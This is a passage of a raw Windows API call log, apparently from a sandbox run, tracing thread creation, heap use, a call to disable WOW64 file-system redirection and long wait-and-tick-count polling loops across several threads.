lpStartAddress=0x408d90, lpParameter=0x67f838, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x11c [0035.021] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x67f838, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x128 [0035.022] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x67f838, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x130 [0035.023] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x67f838, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x138 [0035.024] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x6503f0 [0035.024] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6503f0, Size=0x20) returned 0x635ec0 [0035.024] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x6503f0 [0035.024] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6503f0, Size=0x20) returned 0x635ee8 [0035.025] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0035.025] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0035.025] Wow64DisableWow64FsRedirection (in: OldValue=0x249ff84 | out: OldValue=0x249ff84*=0x0) returned 1 [0035.025] lstrlenW (lpString="kernel32.dll") returned 12 [0035.025] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635ec0 | out: hHeap=0x600000) returned 1 [0035.025] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0035.025] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635ee8 | out: hHeap=0x600000) returned 1 [0035.025] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x63b5a8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x140 [0035.027] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0035.334] GetTickCount () returned 0x18017 [0035.334] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0035.506] GetTickCount () returned 0x180c3 [0035.506] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0036.040] GetTickCount () returned 0x18287 [0036.040] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0036.521] GetTickCount () returned 0x1846b [0036.521] GetTickCount () returned 0x1846b [0036.521] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0036.976] GetTickCount () returned 0x185b2 [0036.976] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0037.208] GetTickCount () returned 0x1869c [0037.208] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0037.573] GetTickCount () returned 0x18813 [0037.573] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0037.967] GetTickCount () returned 0x1896a [0037.967] GetTickCount () returned 0x1896a [0037.967] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0038.626] GetTickCount () returned 0x189e7 [0038.626] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0038.866] GetTickCount () returned 0x18aa2 [0038.866] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0039.085] GetTickCount () returned 0x18b7c [0039.085] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0039.741] GetTickCount () returned 0x18e1b [0039.742] GetTickCount () returned 0x18e1b [0039.742] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0040.006] GetTickCount () returned 0x18ef5 [0040.006] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0040.323] GetTickCount () returned 0x1902d [0040.323] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0040.614] GetTickCount () returned 0x19117 [0040.614] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0040.722] GetTickCount () returned 0x19185 [0040.722] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0040.871] GetTickCount () returned 0x19211 [0040.871] GetTickCount () returned 0x19211 [0040.871] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0041.459] GetTickCount () returned 0x193a7 [0041.459] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0041.688] GetTickCount () returned 0x19481 [0041.688] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0042.066] GetTickCount () returned 0x195c9 [0042.066] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0042.210] GetTickCount () returned 0x19655 [0042.210] GetTickCount () returned 0x19655 [0042.210] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0042.490] GetTickCount () returned 0x1974f [0042.490] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0042.897] GetTickCount () returned 0x198c5 [0042.897] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0043.190] GetTickCount () returned 0x199ed [0043.190] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0043.467] GetTickCount () returned 0x19ae7 [0043.467] GetTickCount () returned 0x19ae7 [0043.467] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0043.842] GetTickCount () returned 0x19c5d [0043.842] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0044.118] GetTickCount () returned 0x19d76 [0044.118] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0044.451] GetTickCount () returned 0x19e7f [0044.451] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0044.583] GetTickCount () returned 0x19f0c [0044.583] GetTickCount () returned 0x19f0c [0044.583] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0044.716] GetTickCount () returned 0x19f98 [0044.719] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0045.098] GetTickCount () returned 0x1a0a1 [0045.098] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0045.591] GetTickCount () returned 0x1a16c [0045.591] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0045.740] GetTickCount () returned 0x1a208 [0045.740] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0045.841] GetTickCount () returned 0x1a275 [0045.841] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0045.950] GetTickCount () returned 0x1a2e3 [0045.950] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0046.060] GetTickCount () returned 0x1a350 [0046.060] GetTickCount () returned 0x1a350 [0046.060] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0046.191] GetTickCount () returned 0x1a3cd [0046.191] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0046.293] GetTickCount () returned 0x1a43a [0046.293] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0046.402] GetTickCount () returned 0x1a4a7 [0046.402] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0046.518] GetTickCount () returned 0x1a514 [0046.518] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0046.666] GetTickCount () returned 0x1a581 [0046.666] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0046.782] GetTickCount () returned 0x1a5fe [0046.782] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0046.886] GetTickCount () returned 0x1a66b [0046.886] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0047.167] GetTickCount () returned 0x1a784 [0047.167] GetTickCount () returned 0x1a784 [0047.167] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0047.281] GetTickCount () returned 0x1a7f1 [0047.281] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0047.401] GetTickCount () returned 0x1a86e [0047.401] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0047.510] GetTickCount () returned 0x1a8db [0047.510] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0047.932] GetTickCount () returned 0x1aa81 [0047.932] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0048.155] GetTickCount () returned 0x1ab5b [0048.155] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0048.322] GetTickCount () returned 0x1ac07 [0048.322] GetTickCount () returned 0x1ac07 [0048.322] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0048.430] GetTickCount () returned 0x1ac74 [0048.430] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0048.552] GetTickCount () returned 0x1ace1 [0048.552] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0048.810] GetTickCount () returned 0x1adea [0048.810] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0049.034] GetTickCount () returned 0x1aec5 [0049.034] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0049.396] GetTickCount () returned 0x1b02b [0049.396] GetTickCount () returned 0x1b02b [0049.396] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0049.537] GetTickCount () returned 0x1b0b8 [0049.537] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0049.740] GetTickCount () returned 0x1b183 [0049.740] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0049.887] GetTickCount () returned 0x1b21f [0049.887] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0050.150] GetTickCount () returned 0x1b328 [0050.150] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0050.327] GetTickCount () returned 0x1b3d3 [0050.327] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0050.546] GetTickCount () returned 0x1b4ae [0050.546] GetTickCount () returned 0x1b4ae [0050.546] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0050.661] GetTickCount () returned 0x1b52b [0050.661] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0050.771] GetTickCount () returned 0x1b598 [0050.771] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0051.318] GetTickCount () returned 0x1b7ba [0051.318] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0051.639] GetTickCount () returned 0x1b8f2 [0051.639] GetTickCount () returned 0x1b8f2 [0051.639] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0051.993] GetTickCount () returned 0x1ba59 [0051.993] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0052.135] GetTickCount () returned 0x1bae5 [0052.135] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0052.237] GetTickCount () returned 0x1bb52 [0052.237] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0052.374] GetTickCount () returned 0x1bbcf [0052.374] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0052.481] GetTickCount () returned 0x1bc3c [0052.481] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0052.593] GetTickCount () returned 0x1bca9 [0052.593] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0052.887] GetTickCount () returned 0x1bdd2 [0052.887] GetTickCount () returned 0x1bdd2 [0052.888] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0052.987] GetTickCount () returned 0x1be3f [0052.987] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0053.095] GetTickCount () returned 0x1beac [0053.095] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0053.251] GetTickCount () returned 0x1bf48 [0053.251] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0053.421] GetTickCount () returned 0x1bfe4 [0053.421] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0053.517] GetTickCount () returned 0x1c051 [0053.517] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0053.783] GetTickCount () returned 0x1c15b [0053.783] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0054.123] GetTickCount () returned 0x1c2a2 [0054.123] GetTickCount () returned 0x1c2a2 [0054.123] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0054.246] GetTickCount () returned 0x1c31f [0054.246] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0054.438] GetTickCount () returned 0x1c3ea [0054.438] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0054.743] GetTickCount () returned 0x1c512 [0054.743] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0054.967] GetTickCount () returned 0x1c5fc [0054.967] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0055.132] GetTickCount () returned 0x1c698 [0055.132] GetTickCount () returned 0x1c698 [0055.132] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0055.232] GetTickCount () returned 0x1c705 [0055.232] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0055.696] GetTickCount () returned 0x1c8ca [0055.696] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0056.003] GetTickCount () returned 0x1ca02 [0056.003] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) Thread: id = 8 os_tid = 0x9cc [0035.020] GetTickCount () returned 0x17f6b [0035.020] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x24) returned 0x67fa78 [0035.020] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x67fa78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x124 [0035.022] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x67fa78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12c [0035.023] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x67fa78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x134 [0035.024] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x67fa78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13c [0035.026] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x6503f0 [0035.026] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6503f0, Size=0x20) returned 0x635ee8 [0035.026] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x6503f0 [0035.026] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6503f0, Size=0x20) returned 0x635ec0 [0035.026] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0035.026] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0035.026] Wow64DisableWow64FsRedirection (in: OldValue=0x25dff84 | out: OldValue=0x25dff84*=0x0) returned 1 [0035.026] lstrlenW (lpString="kernel32.dll") returned 12 [0035.026] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635ee8 | out: hHeap=0x600000) returned 1 [0035.026] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0035.026] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635ec0 | out: hHeap=0x600000) returned 1 [0035.026] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x65d5b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x144 [0035.027] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0035.334] GetTickCount () returned 0x18017 [0035.334] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0035.506] GetTickCount () returned 0x180c3 [0035.506] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0036.040] GetTickCount () returned 0x18287 [0036.040] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0036.521] GetTickCount () returned 0x1846b [0036.521] GetTickCount () returned 0x1846b [0036.521] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0036.976] GetTickCount () returned 0x185b2 [0036.976] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0037.208] GetTickCount () returned 0x1869c [0037.208] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0037.573] GetTickCount () returned 0x18813 [0037.573] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0037.967] GetTickCount () returned 0x1896a [0037.967] GetTickCount () returned 0x1896a [0037.967] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0038.626] GetTickCount () returned 0x189e7 [0038.626] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0038.866] GetTickCount () returned 0x18aa2 [0038.866] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0039.085] GetTickCount () returned 0x18b7c [0039.085] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0039.742] GetTickCount () returned 0x18e1b [0039.742] GetTickCount () returned 0x18e1b [0039.742] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0040.005] GetTickCount () returned 0x18ef5 [0040.006] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0040.323] GetTickCount () returned 0x1902d [0040.323] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0040.614] GetTickCount () returned 0x19117 [0040.614] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0040.722] GetTickCount () returned 0x19185 [0040.723] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0040.871] GetTickCount () returned 0x19211 [0040.871] GetTickCount () returned 0x19211 [0040.871] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0041.460] GetTickCount () returned 0x193a7 [0041.460] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0041.688] GetTickCount () returned 0x19481 [0041.688] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0042.066] GetTickCount () returned 0x195c9 [0042.066] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0042.210] GetTickCount () returned 0x19655 [0042.210] GetTickCount () returned 0x19655 [0042.210] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0042.491] GetTickCount () returned 0x1974f [0042.491] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0042.897] GetTickCount () returned 0x198c5 [0042.897] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0043.190] GetTickCount () returned 0x199ed [0043.190] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0043.467] GetTickCount () returned 0x19ae7 [0043.467] GetTickCount () returned 0x19ae7 [0043.467] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0043.842] GetTickCount () returned 0x19c5d [0043.842] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0044.118] GetTickCount () returned 0x19d76 [0044.118] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0044.451] GetTickCount () returned 0x19e7f [0044.451] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0044.583] GetTickCount () returned 0x19f0c [0044.584] GetTickCount () returned 0x19f0c [0044.584] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0044.719] GetTickCount () returned 0x19f98 [0044.719] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0045.098] GetTickCount () returned 0x1a0a1 [0045.098] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0045.591] GetTickCount () returned 0x1a16c [0045.591] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0045.740] GetTickCount () returned 0x1a208 [0045.740] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0045.841] GetTickCount () returned 0x1a275 [0045.841] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0045.950] GetTickCount () returned 0x1a2e3 [0045.950] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0046.059] GetTickCount () returned 0x1a350 [0046.060] GetTickCount () returned 0x1a350 [0046.060] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0046.191] GetTickCount () returned 0x1a3cd [0046.191] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0046.293] GetTickCount () returned 0x1a43a [0046.293] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0046.403] GetTickCount () returned 0x1a4a7 [0046.403] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0046.519] GetTickCount () returned 0x1a514 [0046.519] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0046.666] GetTickCount () returned 0x1a581 [0046.666] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0046.782] GetTickCount () returned 0x1a5fe [0046.782] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0046.886] GetTickCount () returned 0x1a66b [0046.886] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0047.167] GetTickCount () returned 0x1a784 [0047.167] GetTickCount () returned 0x1a784 [0047.167] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0047.281] GetTickCount () returned 0x1a7f1 [0047.281] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0047.401] GetTickCount () returned 0x1a85f [0047.401] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0047.495] GetTickCount () returned 0x1a8cc [0047.495] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0047.931] GetTickCount () returned 0x1aa81 [0047.931] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0048.155] GetTickCount () returned 0x1ab5b [0048.155] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0048.322] GetTickCount () returned 0x1ac07 [0048.322] GetTickCount () returned 0x1ac07 [0048.322] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0048.431] GetTickCount () returned 0x1ac74 [0048.431] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0048.552] GetTickCount () returned 0x1ace1 [0048.552] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0048.810] GetTickCount () returned 0x1adea [0048.810] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0049.034] GetTickCount () returned 0x1aec5 [0049.034] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0049.396] GetTickCount () returned 0x1b02b [0049.396] GetTickCount () returned 0x1b02b [0049.396] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0049.537] GetTickCount () returned 0x1b0b8 [0049.537] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0049.740] GetTickCount () returned 0x1b183 [0049.740] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0049.887] GetTickCount () returned 0x1b21f [0049.887] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0050.150] GetTickCount () returned 0x1b328 [0050.150] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0050.327] GetTickCount () returned 0x1b3d3 [0050.327] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0050.546] GetTickCount () returned 0x1b4ae [0050.546] GetTickCount () returned 0x1b4ae [0050.546] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0050.662] GetTickCount () returned 0x1b52b [0050.662] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0050.771] GetTickCount () returned 0x1b598 [0050.771] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0051.317] GetTickCount () returned 0x1b7ba [0051.317] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0051.639] GetTickCount () returned 0x1b8f2 [0051.639] GetTickCount () returned 0x1b8f2 [0051.639] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0051.993] GetTickCount () returned 0x1ba59 [0051.993] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0052.135] GetTickCount () returned 0x1bae5 [0052.135] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0052.237] GetTickCount () returned 0x1bb52 [0052.237] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0052.374] GetTickCount () returned 0x1bbcf [0052.374] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0052.481] GetTickCount () returned 0x1bc3c [0052.481] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0052.593] GetTickCount () returned 0x1bca9 [0052.593] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0052.888] GetTickCount () returned 0x1bdd2 [0052.888] GetTickCount () returned 0x1bdd2 [0052.888] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0052.988] GetTickCount () returned 0x1be3f [0052.988] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0053.095] GetTickCount () returned 0x1beac [0053.095] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0053.252] GetTickCount () returned 0x1bf48 [0053.252] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0053.421] GetTickCount () returned 0x1bfe4 [0053.421] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0053.517] GetTickCount () returned 0x1c051 [0053.517] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0053.783] GetTickCount () returned 0x1c15b [0053.783] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0054.123] GetTickCount () returned 0x1c2a2 [0054.123] GetTickCount () returned 0x1c2a2 [0054.123] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0054.246] GetTickCount () returned 0x1c31f [0054.246] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0054.438] GetTickCount () returned 0x1c3ea [0054.438] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0054.743] GetTickCount () returned 0x1c512 [0054.743] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0054.967] GetTickCount () returned 0x1c5fc [0054.967] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0055.132] GetTickCount () returned 0x1c698 [0055.132] GetTickCount () returned 0x1c698 [0055.132] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0055.232] GetTickCount () returned 0x1c705 [0055.232] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0055.688] GetTickCount () returned 0x1c8ca [0055.688] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0056.003] GetTickCount () returned 0x1ca02 [0056.003] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) Thread: id = 10 os_tid = 0x9e8 [0035.248] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10000) returned 0x680520 [0035.248] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10000) returned 0x690528 [0035.249] 